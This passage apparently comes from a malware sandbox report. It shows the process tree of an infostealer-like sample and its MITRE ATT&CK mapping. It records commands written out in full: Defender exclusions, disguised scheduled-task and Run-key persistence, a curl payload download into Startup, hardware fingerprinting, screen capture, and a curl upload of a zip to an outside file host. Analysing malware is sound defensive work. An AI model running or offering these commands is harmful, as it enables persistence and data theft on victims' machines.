12,181,132,89,212,154,104,235,116), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
  2⤵
  PID:1856
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get serialnumber
    3⤵
    PID:988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
  2⤵
  PID:4428
- - C:\Windows\system32\reg.exe
    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
    3⤵
    PID:4272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
  2⤵
  PID:1164
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
  2⤵
  - Hide Artifacts: Hidden Window
  PID:2796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    PID:4236
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y35tc3vz\y35tc3vz.cmdline"
      4⤵
      PID:1912
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF201.tmp" "c:\Users\Admin\AppData\Local\Temp\y35tc3vz\CSCECD6AEB0B7B48AC8F99B996E6A061CB.TMP"
        5⤵
        
        PID:4456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
  2⤵
  PID:4152
- - C:\Windows\system32\cscript.exe
    cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
    3⤵
    - Checks computer location settings
    PID:1388
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
      4⤵
      PID:2924
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4072
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2604
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\Downloads\PlayboxSetup\playbox.exe" /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:4208
    - - C:\Windows\system32\reg.exe
        
        reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
        5⤵
        Modifies registry key
        
        PID:1332
    - - C:\Windows\system32\curl.exe
        
        curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
        5⤵
        
        PID:4944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
  2⤵
  PID:2908
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic baseboard get serialnumber
    3⤵
    PID:3040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2984
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3652
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
  2⤵
  PID:1832
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_computersystemproduct get uuid
    3⤵
    PID:4004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:5040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
  2⤵
  PID:1140
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Description,PNPDeviceID
    3⤵
    PID:1084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2080
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
  2⤵
  PID:4344
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic memorychip get serialnumber
    3⤵
    PID:1656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
  2⤵
  PID:4904
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    PID:1464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:5012
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    - Blocklisted process makes network request
    PID:3764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
  2⤵
  PID:1012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get processorid
    3⤵
    PID:3292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:2728
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
  2⤵
  PID:4160
- - C:\Windows\system32\getmac.exe
    getmac /NH
    3⤵
    PID:3908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:5044
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3388
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:1156
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:2136
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4060
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3764
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:1884
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:736
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2172
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:2180
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2912
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:1656
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1332
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
  2⤵
  PID:2236
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:3064
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Rijtoovx.zip";"
  2⤵
  PID:1144
- - C:\Windows\system32\curl.exe
    curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Rijtoovx.zip";
    3⤵
    PID:4904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1232
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    - Blocklisted process makes network request
    PID:692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:2172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2024
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2840
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4152
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:2028
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4432
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:1464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4808
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:5072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:5004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:3156
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:1072
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
  2⤵
  PID:5044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:1980
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:692
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4732
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2556
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:1680
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4964
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4836
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3024
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:5004
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2260
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4972
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:3860
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3444
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:928
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4852
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4060
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:5012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:1012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:4528
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2892
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2292

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery